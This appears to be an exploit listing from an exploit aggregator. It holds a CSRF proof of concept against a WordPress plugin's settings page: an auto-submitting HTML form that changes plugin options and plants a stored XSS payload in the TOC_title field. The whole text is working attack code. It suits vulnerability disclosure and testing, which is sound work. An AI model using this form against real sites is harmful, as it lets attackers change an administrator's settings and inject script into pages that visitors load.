Share
## https://sploitus.com/exploit?id=WPEX-ID:7F2AE2C9-57D4-46A0-A9A1-585EC543B153
<form id="test" action="https://example.com/wp-admin/options-general.php?page=postTabs.php" method="POST">
    <input type="text" name="line" value="#fff">
    <input type="text" name="active_font" value="#fff">
    <input type="text" name="active_bg" value="#fff">
    <input type="text" name="over_font" value="#fff">
    <input type="text" name="over_bg" value="#fff">
    <input type="text" name="inactive_font" value="#fff">
    <input type="text" name="inactive_bg" value="#fff">
    <input type="text" name="align" value="left">
    <input type="text" name="TOC_title" value='"><img src=x onerror=alert(/XSS/)>'>
    <input type="text" name="TOC" value="END">
    <input type="text" name="list_link" value="hideshow">
    <input type="text" name="single_link" value="hideshow">
    <input type="text" name="cookies" value="1">
    <input type="text" name="show_perma" value="never">
    <input type="text" name="submit_postTab" value="Update Settings ยป">
</form>
<script>
    document.getElementById("test").submit();
</script>